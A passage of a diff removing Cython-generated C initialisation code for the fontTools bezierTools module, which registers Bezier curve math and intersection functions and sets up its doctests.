__pyx_n_s_sqrt, __pyx_t_2) < 0) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_acos); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_acos, __pyx_t_2) < 0) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_cos); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_cos, __pyx_t_2) < 0) __PYX_ERR(0, 805, __pyx_L1_error) - 
__Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_ImportFrom(__pyx_t_3, __pyx_n_s_pi); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_pi, __pyx_t_2) < 0) __PYX_ERR(0, 805, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":808 - * - * - * def solveQuadratic(a, b, c, sqrt=sqrt): # <<<<<<<<<<<<<< - * """Solve a quadratic equation. - * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_47solveQuadratic, 0, __pyx_n_s_solveQuadratic, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__54)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 808, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (!__Pyx_CyFunction_InitDefaults(__pyx_t_3, sizeof(__pyx_defaults), 1)) __PYX_ERR(0, 808, __pyx_L1_error) - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_sqrt); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 808, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_CyFunction_Defaults(__pyx_defaults, __pyx_t_3)->__pyx_arg_sqrt = __pyx_t_2; - __Pyx_GIVEREF(__pyx_t_2); - __pyx_t_2 = 0; - __Pyx_CyFunction_SetDefaultsGetter(__pyx_t_3, __pyx_pf_9fontTools_4misc_11bezierTools_94__defaults__); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_solveQuadratic, __pyx_t_3) < 0) __PYX_ERR(0, 808, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":841 - * - * - * def solveCubic(a, b, c, d): # <<<<<<<<<<<<<< - * """Solve a cubic equation. 
- * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_49solveCubic, 0, __pyx_n_s_solveCubic, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__56)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 841, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_solveCubic, __pyx_t_3) < 0) __PYX_ERR(0, 841, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":938 - * - * - * def calcQuadraticParameters(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * x2, y2 = pt2 - * x3, y3 = pt3 - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_51calcQuadraticParameters, 0, __pyx_n_s_calcQuadraticParameters, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__58)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 938, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcQuadraticParameters, __pyx_t_3) < 0) __PYX_ERR(0, 938, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":949 - * - * - * def calcCubicParameters(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * x2, y2 = pt2 - * x3, y3 = pt3 - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_53calcCubicParameters, 0, __pyx_n_s_calcCubicParameters, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__60)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 949, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcCubicParameters, __pyx_t_3) < 0) __PYX_ERR(0, 949, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":981 - * - * - * def calcQuadraticPoints(a, b, c): # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_55calcQuadraticPoints, 0, __pyx_n_s_calcQuadraticPoints, NULL, 
__pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__62)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 981, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcQuadraticPoints, __pyx_t_3) < 0) __PYX_ERR(0, 981, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":994 - * - * - * def calcCubicPoints(a, b, c, d): # <<<<<<<<<<<<<< - * ax, ay = a - * bx, by = b - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_57calcCubicPoints, 0, __pyx_n_s_calcCubicPoints, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__64)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 994, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_calcCubicPoints, __pyx_t_3) < 0) __PYX_ERR(0, 994, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1033 - * - * - * def linePointAtT(pt1, pt2, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a line. - * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_59linePointAtT, 0, __pyx_n_s_linePointAtT, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__66)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1033, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_linePointAtT, __pyx_t_3) < 0) __PYX_ERR(0, 1033, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1046 - * - * - * def quadraticPointAtT(pt1, pt2, pt3, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a quadratic curve. 
- * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_61quadraticPointAtT, 0, __pyx_n_s_quadraticPointAtT, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__68)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1046, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_quadraticPointAtT, __pyx_t_3) < 0) __PYX_ERR(0, 1046, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1061 - * - * - * def cubicPointAtT(pt1, pt2, pt3, pt4, t): # <<<<<<<<<<<<<< - * """Finds the point at time `t` on a cubic curve. - * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_63cubicPointAtT, 0, __pyx_n_s_cubicPointAtT, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__70)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1061, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_cubicPointAtT, __pyx_t_3) < 0) __PYX_ERR(0, 1061, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1087 - * - * - * @cython.returns(cython.complex) # <<<<<<<<<<<<<< - * @cython.locals( - * t=cython.double, - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_65cubicPointAtTC, 0, __pyx_n_s_cubicPointAtTC, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__72)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1087, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_cubicPointAtTC, __pyx_t_3) < 0) __PYX_ERR(0, 1087, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1112 - * - * - * def segmentPointAtT(seg, t): # <<<<<<<<<<<<<< - * if len(seg) == 2: - * return linePointAtT(*seg, t) - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_67segmentPointAtT, 0, __pyx_n_s_segmentPointAtT, NULL, 
__pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__74)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1112, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_segmentPointAtT, __pyx_t_3) < 0) __PYX_ERR(0, 1112, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1127 - * - * - * def _line_t_of_pt(s, e, pt): # <<<<<<<<<<<<<< - * sx, sy = s - * ex, ey = e - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_69_line_t_of_pt, 0, __pyx_n_s_line_t_of_pt, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__76)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1127, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_line_t_of_pt, __pyx_t_3) < 0) __PYX_ERR(0, 1127, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1141 - * - * - * def _both_points_are_on_same_side_of_origin(a, b, origin): # <<<<<<<<<<<<<< - * xDiff = (a[0] - origin[0]) * (b[0] - origin[0]) - * yDiff = (a[1] - origin[1]) * (b[1] - origin[1]) - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_71_both_points_are_on_same_side_of_origin, 0, __pyx_n_s_both_points_are_on_same_side_of, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__78)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1141, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_both_points_are_on_same_side_of, __pyx_t_3) < 0) __PYX_ERR(0, 1141, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1147 - * - * - * def lineLineIntersections(s1, e1, s2, e2): # <<<<<<<<<<<<<< - * """Finds intersections between two line segments. 
- * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_73lineLineIntersections, 0, __pyx_n_s_lineLineIntersections, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__80)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1147, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_lineLineIntersections, __pyx_t_3) < 0) __PYX_ERR(0, 1147, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1225 - * - * - * def _alignment_transformation(segment): # <<<<<<<<<<<<<< - * # Returns a transformation which aligns a segment horizontally at the - * # origin. Apply this transformation to curves and root-find to find - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_75_alignment_transformation, 0, __pyx_n_s_alignment_transformation, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__82)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1225, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_alignment_transformation, __pyx_t_3) < 0) __PYX_ERR(0, 1225, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1235 - * - * - * def _curve_line_intersections_t(curve, line): # <<<<<<<<<<<<<< - * aligned_curve = _alignment_transformation(line).transformPoints(curve) - * if len(curve) == 3: - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_77_curve_line_intersections_t, 0, __pyx_n_s_curve_line_intersections_t, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__84)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1235, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_curve_line_intersections_t, __pyx_t_3) < 0) __PYX_ERR(0, 1235, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1248 - * - * - * def 
curveLineIntersections(curve, line): # <<<<<<<<<<<<<< - * """Finds intersections between a curve and a line. - * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_79curveLineIntersections, 0, __pyx_n_s_curveLineIntersections, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__86)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1248, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_curveLineIntersections, __pyx_t_3) < 0) __PYX_ERR(0, 1248, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1286 - * - * - * def _curve_bounds(c): # <<<<<<<<<<<<<< - * if len(c) == 3: - * return calcQuadraticBounds(*c) - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_81_curve_bounds, 0, __pyx_n_s_curve_bounds, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__88)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1286, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_curve_bounds, __pyx_t_3) < 0) __PYX_ERR(0, 1286, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1294 - * - * - * def _split_segment_at_t(c, t): # <<<<<<<<<<<<<< - * if len(c) == 2: - * s, e = c - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_83_split_segment_at_t, 0, __pyx_n_s_split_segment_at_t, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__90)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1294, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_split_segment_at_t, __pyx_t_3) < 0) __PYX_ERR(0, 1294, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1306 - * - * - * def _curve_curve_intersections_t( # <<<<<<<<<<<<<< - * curve1, curve2, precision=1e-3, range1=None, range2=None - * ): - */ - __pyx_t_3 = 
__Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_85_curve_curve_intersections_t, 0, __pyx_n_s_curve_curve_intersections_t, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__93)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1306, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_CyFunction_SetDefaultsTuple(__pyx_t_3, __pyx_tuple__94); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_curve_curve_intersections_t, __pyx_t_3) < 0) __PYX_ERR(0, 1306, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1373 - * - * - * def curveCurveIntersections(curve1, curve2): # <<<<<<<<<<<<<< - * """Finds intersections between a curve and a curve. - * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_87curveCurveIntersections, 0, __pyx_n_s_curveCurveIntersections, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__96)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1373, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_curveCurveIntersections, __pyx_t_3) < 0) __PYX_ERR(0, 1373, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1401 - * - * - * def segmentSegmentIntersections(seg1, seg2): # <<<<<<<<<<<<<< - * """Finds intersections between two segments. 
- * - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_89segmentSegmentIntersections, 0, __pyx_n_s_segmentSegmentIntersections, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__98)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1401, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_segmentSegmentIntersections, __pyx_t_3) < 0) __PYX_ERR(0, 1401, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1449 - * - * - * def _segmentrepr(obj): # <<<<<<<<<<<<<< - * """ - * >>> _segmentrepr([1, [2, 3], [], [[2, [3, 4], [0.1, 2.2]]]]) - */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_91_segmentrepr, 0, __pyx_n_s_segmentrepr, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__100)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1449, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_segmentrepr, __pyx_t_3) < 0) __PYX_ERR(0, 1449, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1462 - * - * - * def printSegments(segments): # <<<<<<<<<<<<<< - * """Helper for the doctests, displaying each segment in a list of - * segments on a single line as a tuple. 
- */ - __pyx_t_3 = __Pyx_CyFunction_New(&__pyx_mdef_9fontTools_4misc_11bezierTools_93printSegments, 0, __pyx_n_s_printSegments, NULL, __pyx_n_s_fontTools_misc_bezierTools, __pyx_d, ((PyObject *)__pyx_codeobj__102)); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1462, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_printSegments, __pyx_t_3) < 0) __PYX_ERR(0, 1462, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1470 - * - * - * if __name__ == "__main__": # <<<<<<<<<<<<<< - * import sys - * import doctest - */ - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_name); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1470, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_10 = (__Pyx_PyUnicode_Equals(__pyx_t_3, __pyx_n_u_main, Py_EQ)); if (unlikely((__pyx_t_10 < 0))) __PYX_ERR(0, 1470, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_10) { - - /* "fontTools/misc/bezierTools.py":1471 - * - * if __name__ == "__main__": - * import sys # <<<<<<<<<<<<<< - * import doctest - * - */ - __pyx_t_3 = __Pyx_ImportDottedModule(__pyx_n_s_sys, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1471, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_sys, __pyx_t_3) < 0) __PYX_ERR(0, 1471, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1472 - * if __name__ == "__main__": - * import sys - * import doctest # <<<<<<<<<<<<<< - * - * sys.exit(doctest.testmod().failed) - */ - __pyx_t_3 = __Pyx_ImportDottedModule(__pyx_n_s_doctest, NULL); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1472, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_d, __pyx_n_s_doctest, __pyx_t_3) < 0) __PYX_ERR(0, 1472, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1474 - * import doctest - * - * sys.exit(doctest.testmod().failed) # <<<<<<<<<<<<<< - */ - 
__Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_sys); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1474, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_exit); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 1474, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_GetModuleGlobalName(__pyx_t_3, __pyx_n_s_doctest); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1474, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_testmod); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1474, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyObject_CallNoArg(__pyx_t_7); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1474, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __pyx_t_7 = __Pyx_PyObject_GetAttrStr(__pyx_t_3, __pyx_n_s_failed); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 1474, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyObject_CallOneArg(__pyx_t_2, __pyx_t_7); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1474, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /* "fontTools/misc/bezierTools.py":1470 - * - * - * if __name__ == "__main__": # <<<<<<<<<<<<<< - * import sys - * import doctest - */ - } - - /* "fontTools/misc/bezierTools.py":1 - * # -*- coding: utf-8 -*- # <<<<<<<<<<<<<< - * """fontTools.misc.bezierTools.py -- tools for working with Bezier path segments. 
- * """ - */ - __pyx_t_3 = __Pyx_PyDict_NewPresized(15); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 1, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_calcQuadraticArcLength_line_151, __pyx_kp_u_Calculates_the_arc_length_for_a) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_calcQuadraticBounds_line_298, __pyx_kp_u_Calculates_the_bounding_rectangl) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_approximateCubicArcLength_line_3, __pyx_kp_u_Approximates_the_arc_length_for) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_calcCubicBounds_line_412, __pyx_kp_u_Calculates_the_bounding_rectangl_2) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_splitLine_line_450, __pyx_kp_u_Split_a_line_at_a_given_coordina) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_splitQuadratic_line_507, __pyx_kp_u_Split_a_quadratic_Bezier_curve_a) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_splitCubic_line_552, __pyx_kp_u_Split_a_cubic_Bezier_curve_at_a) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_splitQuadraticAtT_line_589, __pyx_kp_u_Split_a_quadratic_Bezier_curve_a_2) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_splitCubicAtT_line_613, __pyx_kp_u_Split_a_cubic_Bezier_curve_at_on) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_solveCubic_line_841, __pyx_kp_u_Solve_a_cubic_equation_Solves_a) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_lineLineIntersections_line_1147, __pyx_kp_u_Finds_intersections_between_two) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_curveLineIntersections_line_1248, __pyx_kp_u_Finds_intersections_between_a_cu) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if 
(PyDict_SetItem(__pyx_t_3, __pyx_kp_u_curveCurveIntersections_line_137, __pyx_kp_u_Finds_intersections_between_a_cu_2) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_segmentSegmentIntersections_line, __pyx_kp_u_Finds_intersections_between_two_2) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_t_3, __pyx_kp_u_segmentrepr_line_1449, __pyx_kp_u_segmentrepr_1_2_3_2_3_4_0_1_2) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - if (PyDict_SetItem(__pyx_d, __pyx_n_s_test, __pyx_t_3) < 0) __PYX_ERR(0, 1, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - - /*--- Wrapped vars code ---*/ - - goto __pyx_L0; - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_XDECREF(__pyx_t_8); - __Pyx_XDECREF(__pyx_t_9); - if (__pyx_m) { - if (__pyx_d && stringtab_initialized) { - __Pyx_AddTraceback("init fontTools.misc.bezierTools", __pyx_clineno, __pyx_lineno, 